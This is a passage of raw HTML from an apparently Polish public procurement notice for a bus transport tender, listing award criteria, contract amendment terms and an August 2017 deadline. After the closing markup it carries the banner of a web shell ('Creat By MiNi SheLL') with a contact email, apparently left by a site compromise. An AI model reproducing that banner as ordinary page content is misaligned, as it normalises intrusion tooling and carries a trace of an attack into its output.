collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>czas podstawienia autobusu zastępczego</TD><TD style='border: 1px solid black;border-collapse: collapse;'>5,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>wiek pojazdów do wykonania danego zadania</TD><TD style='border: 1px solid black;border-collapse: collapse;'>35,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Każda zmiana postanowień niniejszej umowy wymaga formy pisemnej w postaci aneksu pod rygorem nieważności .2. Strony zgodnie ustalają, iż zakazuje się zmian postanowień zawartej umowy oraz wprowadzanie nowych postanowień, niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty.3. Umowa może być zmieniona lub rozwiązana jeżeli realizacja umowy nie leży w interesie publicznym lub narusza zasady finansów publicznych.4. Strony ustalają, że możliwa jest zmiana postanowień zawartej umowy w przypadku zmiany przepisów dotyczących wysokości podatku od towarów i usług lub wystąpienia klęsk żywiołowych uniemożliwiających jej realizację.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-08-10</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data">2017-09-09</span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres"></span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com